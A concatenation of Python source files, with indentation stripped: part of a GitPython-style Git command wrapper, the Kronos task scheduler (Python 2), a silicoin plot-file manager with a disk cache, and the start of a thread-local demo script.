exec_kwargs = {k: v for k, v in kwargs.items() if k in execute_kwargs}
opts_kwargs = {k: v for k, v in kwargs.items() if k not in execute_kwargs}
insert_after_this_arg = opts_kwargs.pop("insert_kwargs_after", None)
# Prepare the argument list
opt_args = self.transform_kwargs(**opts_kwargs)
ext_args = self.__unpack_args([a for a in args if a is not None])
if insert_after_this_arg is None:
args_list = opt_args + ext_args
else:
try:
index = ext_args.index(insert_after_this_arg)
except ValueError as err:
raise ValueError(
"Couldn't find argument '%s' in args %s to insert cmd options after"
% (insert_after_this_arg, str(ext_args))
) from err
# end handle error
args_list = ext_args[: index + 1] + opt_args + ext_args[index + 1 :]
# end handle opts_kwargs
call = [self.GIT_PYTHON_GIT_EXECUTABLE]
# add persistent git options
call.extend(self._persistent_git_options)
# add the git options, then reset to empty
# to avoid side_effects
call.extend(self._git_options)
self._git_options = ()
call.append(dashify(method))
call.extend(args_list)
return self.execute(call, **exec_kwargs)
def _parse_object_header(self, header_line: str) -> Tuple[str, str, int]:
"""
:param header_line:
<hex_sha> type_string size_as_int
:return: (hex_sha, type_string, size_as_int)
:raise ValueError: if the header contains indication for an error due to
incorrect input sha"""
tokens = header_line.split()
if len(tokens) != 3:
if not tokens:
raise ValueError("SHA could not be resolved, git returned: %r" % (header_line.strip()))
else:
raise ValueError("SHA %s could not be resolved, git returned: %r" % (tokens[0], header_line.strip()))
# END handle actual return value
# END error handling
if len(tokens[0]) != 40:
raise ValueError("Failed to parse header: %r" % header_line)
return (tokens[0], tokens[1], int(tokens[2]))
def _prepare_ref(self, ref: AnyStr) -> bytes:
# required for command to separate refs on stdin, as bytes
if isinstance(ref, bytes):
# Assume 40 bytes hexsha - bin-to-ascii for some reason returns bytes, not text
refstr: str = ref.decode("ascii")
elif not isinstance(ref, str):
refstr = str(ref) # could be ref-object
else:
refstr = ref
if not refstr.endswith("\n"):
refstr += "\n"
return refstr.encode(defenc)
def _get_persistent_cmd(self, attr_name: str, cmd_name: str, *args: Any, **kwargs: Any) -> "Git.AutoInterrupt":
cur_val = getattr(self, attr_name)
if cur_val is not None:
return cur_val
options = {"istream": PIPE, "as_process": True}
options.update(kwargs)
cmd = self._call_process(cmd_name, *args, **options)
setattr(self, attr_name, cmd)
cmd = cast("Git.AutoInterrupt", cmd)
return cmd
def __get_object_header(self, cmd: "Git.AutoInterrupt", ref: AnyStr) -> Tuple[str, str, int]:
if cmd.stdin and cmd.stdout:
cmd.stdin.write(self._prepare_ref(ref))
cmd.stdin.flush()
return self._parse_object_header(cmd.stdout.readline())
else:
raise ValueError("cmd stdin was empty")
def get_object_header(self, ref: str) -> Tuple[str, str, int]:
"""Use this method to quickly examine the type and size of the object behind
the given ref.
:note: The method will only suffer from the costs of command invocation
once and reuses the command in subsequent calls.
:return: (hexsha, type_string, size_as_int)"""
cmd = self._get_persistent_cmd("cat_file_header", "cat_file", batch_check=True)
return self.__get_object_header(cmd, ref)
def get_object_data(self, ref: str) -> Tuple[str, str, int, bytes]:
"""As get_object_header, but returns object data as well
:return: (hexsha, type_string, size_as_int,data_string)
:note: not threadsafe"""
hexsha, typename, size, stream = self.stream_object_data(ref)
data = stream.read(size)
del stream
return (hexsha, typename, size, data)
def stream_object_data(self, ref: str) -> Tuple[str, str, int, "Git.CatFileContentStream"]:
"""As get_object_header, but returns the data as a stream
:return: (hexsha, type_string, size_as_int, stream)
:note: This method is not threadsafe, you need one independent Command instance per thread to be safe !"""
cmd = self._get_persistent_cmd("cat_file_all", "cat_file", batch=True)
hexsha, typename, size = self.__get_object_header(cmd, ref)
cmd_stdout = cmd.stdout if cmd.stdout is not None else io.BytesIO()
return (hexsha, typename, size, self.CatFileContentStream(size, cmd_stdout))
def clear_cache(self) -> "Git":
"""Clear all kinds of internal caches to release resources.
Currently persistent commands will be interrupted.
:return: self"""
for cmd in (self.cat_file_all, self.cat_file_header):
if cmd:
cmd.__del__()
self.cat_file_all = None
self.cat_file_header = None
return self
|
scheduler.py
|
# coding=utf-8
"""Module that provides a cron-like task scheduler.
This task scheduler is designed to be used from inside your own program.
You can schedule Python functions to be called at specific intervals or
days. It uses the standard 'sched' module for the actual task scheduling,
but provides much more:
* repeated tasks (at intervals, or on specific days)
* error handling (exceptions in tasks don't kill the scheduler)
* optional to run scheduler in its own thread or separate process
* optional to run a task in its own thread or separate process
If the threading module is available, you can use the various Threaded
variants of the scheduler and associated tasks. If threading is not
available, you could still use the forked variants. If fork is also
not available, all processing is done in a single process, sequentially.
There are three Scheduler classes:
Scheduler ThreadedScheduler ForkedScheduler
You usually add new tasks to a scheduler using the add_interval_task or
add_daytime_task methods, with the appropriate processmethod argument
to select sequential, threaded or forked processing. NOTE: it is impossible
to add new tasks to a ForkedScheduler, after the scheduler has been started!
For more control you can use one of the following Task classes
and use schedule_task or schedule_task_abs:
IntervalTask ThreadedIntervalTask ForkedIntervalTask
SingleTask ThreadedSingleTask ForkedSingleTask
WeekdayTask ThreadedWeekdayTask ForkedWeekdayTask
MonthdayTask ThreadedMonthdayTask ForkedMonthdayTask
Kronos is the Greek God of Time.
Kronos scheduler (c) Irmen de Jong.
This version has been extracted from the Turbogears source repository
and slightly changed to be completely stand-alone again. Also some fixes
have been made to make it work on Python 2.6 (sched module changes).
The version in Turbogears is based on the original stand-alone Kronos.
This is open-source software, released under the MIT Software License:
http://www.opensource.org/licenses/mit-license.php
"""
__version__ = "2.0"
__all__ = [
"DayTaskRescheduler",
"ForkedIntervalTask",
"ForkedMonthdayTask",
"ForkedScheduler",
"ForkedSingleTask",
"ForkedTaskMixin",
"ForkedWeekdayTask",
"IntervalTask",
"MonthdayTask",
"Scheduler",
"SingleTask",
"Task",
"ThreadedIntervalTask",
"ThreadedMonthdayTask",
"ThreadedScheduler",
"ThreadedSingleTask",
"ThreadedTaskMixin",
"ThreadedWeekdayTask",
"WeekdayTask",
]
import os
import sys
import sched
import time
import traceback
import weakref
class method:
sequential = "sequential"
forked = "forked"
threaded = "threaded"
class Scheduler:
"""The Scheduler itself."""
def __init__(self):
self.running = True
self.sched = sched.scheduler(time.time, self.__delayfunc)
def __delayfunc(self, delay):
# This delay function is basically a time.sleep() that is
# divided up, so that we can check the self.running flag while
# delaying. There is an additional check in here to ensure that the
# top item of the queue hasn't changed
if delay < 10:
time.sleep(delay)
else:
toptime = self._getqueuetoptime()
endtime = time.time() + delay
period = 5
stoptime = endtime - period
while (self.running
and stoptime > time.time()
and self._getqueuetoptime() == toptime):
time.sleep(period)
if not self.running or self._getqueuetoptime() != toptime:
return
now = time.time()
if endtime > now:
time.sleep(endtime - now)
def _acquire_lock(self):
pass
def _release_lock(self):
pass
def add_interval_task(self, action, taskname, initialdelay, interval,
processmethod, args, kw, abs=False):
"""Add a new Interval Task to the schedule.
A very short initialdelay or one of zero cannot be honored, you will
see a slight delay before the task is first executed. This is because
the scheduler needs to pick it up in its loop.
"""
if initialdelay < 0 or interval < 1:
raise ValueError("Delay or interval must be >0")
# Select the correct IntervalTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = IntervalTask
elif processmethod == method.threaded:
TaskClass = ThreadedIntervalTask
elif processmethod == method.forked:
TaskClass = ForkedIntervalTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, interval, action, args, kw, abs)
self.schedule_task(task, initialdelay)
return task
def add_single_task(self, action, taskname, initialdelay, processmethod,
args, kw):
"""Add a new task to the scheduler that will only be executed once."""
if initialdelay < 0:
raise ValueError("Delay must be >0")
# Select the correct SingleTask class. Not all types may be available!
if processmethod == method.sequential:
TaskClass = SingleTask
elif processmethod == method.threaded:
TaskClass = ThreadedSingleTask
elif processmethod == method.forked:
TaskClass = ForkedSingleTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, action, args, kw)
self.schedule_task(task, initialdelay)
return task
def add_daytime_task(self, action, taskname, weekdays, monthdays,
timeonday, processmethod, args, kw):
"""Add a new Day Task (Weekday or Monthday) to the schedule."""
if weekdays and monthdays:
raise ValueError("You can only specify weekdays or monthdays, "
"not both")
if not args:
args = []
if not kw:
kw = {}
if weekdays:
# Select the correct WeekdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = WeekdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedWeekdayTask
elif processmethod == method.forked:
TaskClass = ForkedWeekdayTask
else:
raise ValueError("Invalid processmethod")
task = TaskClass(taskname, weekdays, timeonday, action, args, kw)
if monthdays:
# Select the correct MonthdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = MonthdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedMonthdayTask
elif processmethod == method.forked:
TaskClass = ForkedMonthdayTask
else:
raise ValueError("Invalid processmethod")
task = TaskClass(taskname, monthdays, timeonday, action, args, kw)
firsttime = task.get_schedule_time(True)
self.schedule_task_abs(task, firsttime)
return task
def schedule_task(self, task, delay):
"""Add a new task to the scheduler with the given delay (seconds).
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),))
finally:
self._release_lock()
else:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),))
def schedule_task_abs(self, task, abstime):
"""Add a new task to the scheduler for the given absolute time value.
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),))
finally:
self._release_lock()
else:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),))
def start(self):
"""Start the scheduler."""
self._run()
def stop(self):
"""Remove all pending tasks and stop the Scheduler."""
self.running = False
self._clearschedqueue()
def cancel(self, task):
"""Cancel given scheduled task."""
self.sched.cancel(task.event)
if sys.version_info >= (2, 6):
# code for sched module of python 2.6+
def _getqueuetoptime(self):
return self.sched._queue[0].time
def _clearschedqueue(self):
self.sched._queue[:] = []
else:
# code for sched module of python 2.5 and older
def _getqueuetoptime(self):
return self.sched.queue[0][0]
def _clearschedqueue(self):
self.sched.queue[:] = []
def _run(self):
# Low-level run method to do the actual scheduling loop.
while self.running:
try:
self.sched.run()
except Exception, x:
print >> sys.stderr, "ERROR DURING SCHEDULER EXECUTION", x
print >> sys.stderr, "".join(
traceback.format_exception(*sys.exc_info()))
print >> sys.stderr, "-" * 20
# queue is empty; sleep a short while before checking again
if self.running:
time.sleep(5)
class Task:
"""Abstract base class of all scheduler tasks"""
def __init__(self, name, action, args, kw):
"""This is an abstract class!"""
self.name = name
self.action = action
self.args = args
self.kw = kw
def __call__(self, schedulerref):
"""Execute the task action in the scheduler's thread."""
try:
self.execute()
except Exception, x:
self.handle_exception(x)
self.reschedule(schedulerref())
def reschedule(self, scheduler):
"""This method should be defined in one of the sub classes!"""
raise NotImplementedError("You're using the abstract class 'Task',"
" use a concrete class instead")
def execute(self):
"""Execute the actual task."""
self.action(*self.args, **self.kw)
def handle_exception(self, exc):
"""Handle any exception that occured during task execution."""
print >> sys.stderr, "ERROR DURING TASK EXECUTION", exc
print >> sys.stderr, "".join(traceback.format_exception(
*sys.exc_info()))
print >> sys.stderr, "-" * 20
class SingleTask(Task):
"""A task that only runs once."""
def reschedule(self, scheduler):
pass
class IntervalTask(Task):
"""A repeated task that occurs at certain intervals (in seconds)."""
def __init__(self, name, interval, action, args=None, kw=None, abs=False):
Task.__init__(self, name, action, args, kw)
self.absolute = abs
self.interval = interval
self.duration = 0
def execute(self):
""" Execute the actual task."""
start_time = time.time()
self.action(*self.args, **self.kw)
end_time = time.time()
self.duration = int(end_time - start_time)
def reschedule(self, scheduler):
"""Reschedule this task according to its interval (in seconds)."""
if self.absolute and self.duration:
if self.duration < self.interval:
scheduler.schedule_task(self, self.interval - self.duration)
else:
scheduler.schedule_task(self, 0)
else:
scheduler.schedule_task(self, self.interval)
class DayTaskRescheduler:
"""A mixin class that contains the reschedule logic for the DayTasks."""
def __init__(self, timeonday):
self.timeonday = timeonday
def get_schedule_time(self, today):
"""Calculate the time value at which this task is to be scheduled."""
now = list(time.localtime())
if today:
# schedule for today. let's see if that is still possible
if (now[3], now[4]) >= self.timeonday:
# too bad, it will be tomorrow
now[2] += 1
else:
# tomorrow
now[2] += 1
# set new time on day (hour,minute)
now[3], now[4] = self.timeonday
# seconds
now[5] = 0
return time.mktime(now)
def reschedule(self, scheduler):
"""Reschedule this task according to the daytime for the task.
The task is scheduled for tomorrow, for the given daytime.
"""
# (The execute method in the concrete Task classes will check
# if the current day is a day on which the task must run).
abstime = self.get_schedule_time(False)
scheduler.schedule_task_abs(self, abstime)
class WeekdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a week (1-7), at a fixed time
on the day.
"""
def __init__(self, name, weekdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(weekdays) not in (list, tuple):
raise TypeError("weekdays must be a sequence of weekday numbers "
"1-7 (1 is Monday)")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = weekdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the week).
weekday = time.localtime().tm_wday + 1
if weekday in self.days:
self.action(*self.args, **self.kw)
class MonthdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a month (1-31), at a fixed
time on the day.
"""
def __init__(self, name, monthdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(monthdays) not in (list, tuple):
raise TypeError("monthdays must be a sequence of numbers 1-31")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = monthdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the month).
if time.localtime().tm_mday in self.days:
self.action(*self.args, **self.kw)
try:
import threading
class ThreadedScheduler(Scheduler):
"""A Scheduler that runs in its own thread."""
def __init__(self):
Scheduler.__init__(self)
# we require a lock around the task queue
self._lock = threading.Lock()
def start(self):
"""Splice off a thread in which the scheduler will run."""
self.thread = threading.Thread(target=self._run)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
"""Stop the scheduler and wait for the thread to finish."""
Scheduler.stop(self)
try:
self.thread.join()
except AttributeError:
pass
def _acquire_lock(self):
"""Lock the thread's task queue."""
self._lock.acquire()
def _release_lock(self):
"""Release the lock on th ethread's task queue."""
self._lock.release()
class ThreadedTaskMixin:
"""A mixin class to make a Task execute in a separate thread."""
def __call__(self, schedulerref):
"""Execute the task action in its own thread."""
threading.Thread(target=self.threadedcall).start()
self.reschedule(schedulerref())
def threadedcall(self):
# This method is run within its own thread, so we have to
# do the execute() call and exception handling here.
try:
self.execute()
except Exception, x:
self.handle_exception(x)
class ThreadedIntervalTask(ThreadedTaskMixin, IntervalTask):
"""Interval Task that executes in its own thread."""
pass
class ThreadedSingleTask(ThreadedTaskMixin, SingleTask):
"""Single Task that executes in its own thread."""
pass
class ThreadedWeekdayTask(ThreadedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own thread."""
pass
class ThreadedMonthdayTask(ThreadedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own thread."""
pass
except ImportError:
# threading is not available
pass
if hasattr(os, "fork"):
import signal
class ForkedScheduler(Scheduler):
"""A Scheduler that runs in its own forked process."""
def __del__(self):
if hasattr(self, "childpid"):
os.kill(self.childpid, signal.SIGKILL)
def start(self):
"""Fork off a new process in which the scheduler will run."""
pid = os.fork()
if pid == 0:
# we are the child
signal.signal(signal.SIGUSR1, self.signalhandler)
self._run()
os._exit(0)
else:
# we are the parent
self.childpid = pid
# can no longer insert in the scheduler queue
del self.sched
def stop(self):
"""Stop the scheduler and wait for the process to finish."""
os.kill(self.childpid, signal.SIGUSR1)
os.waitpid(self.childpid, 0)
def signalhandler(self, sig, stack):
Scheduler.stop(self)
class ForkedTaskMixin:
"""A mixin class to make a Task execute in a separate process."""
def __call__(self, schedulerref):
"""Execute the task action in its own process."""
pid = os.fork()
if pid == 0:
# we are the child
try:
self.execute()
except Exception, x:
self.handle_exception(x)
os._exit(0)
else:
# we are the parent
self.reschedule(schedulerref())
class ForkedIntervalTask(ForkedTaskMixin, IntervalTask):
"""Interval Task that executes in its own process."""
pass
class ForkedSingleTask(ForkedTaskMixin, SingleTask):
"""Single Task that executes in its own process."""
pass
class ForkedWeekdayTask(ForkedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own process."""
pass
class ForkedMonthdayTask(ForkedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own process."""
pass
if __name__ == "__main__":
def testaction(arg):
print ">>>TASK", arg, "sleeping 3 seconds"
time.sleep(3)
print "<<<END_TASK", arg
s = ThreadedScheduler()
s.add_interval_task(testaction,
"test action 1",
0,
4,
method.threaded,
["task 1"],
None)
s.start()
print "Scheduler started, waiting 15 sec...."
time.sleep(15)
print "STOP SCHEDULER"
s.stop()
print "EXITING"
|
manager.py
|
import logging
import threading
import time
import traceback
from concurrent.futures.thread import ThreadPoolExecutor
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Callable, Dict, Iterator, List, Optional, Set, Tuple
from blspy import G1Element
from chiapos import DiskProver
from silicoin.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from silicoin.plotting.util import (
PlotInfo,
PlotRefreshEvents,
PlotRefreshResult,
PlotsRefreshParameter,
get_plot_filenames,
parse_plot_info,
stream_plot_info_ph,
stream_plot_info_pk,
)
from silicoin.types.blockchain_format.proof_of_space import ProofOfSpace
from silicoin.types.blockchain_format.sized_bytes import bytes32
from silicoin.util.ints import uint16
from silicoin.util.path import mkdir
from silicoin.util.streamable import Streamable, streamable
from silicoin.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
farmer_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
total_result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
def batches() -> Iterator[Tuple[int, List[Path]]]:
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(
pool_public_key, pool_contract_puzzle_hash, plot_public_key, farmer_public_key
)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
cache_entry.farmer_public_key,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
demo01.py
|
# 上下文对象
# threadlocal
# 在同一线程中传递值,线程隔离的,保证变量的线程安全
import threading
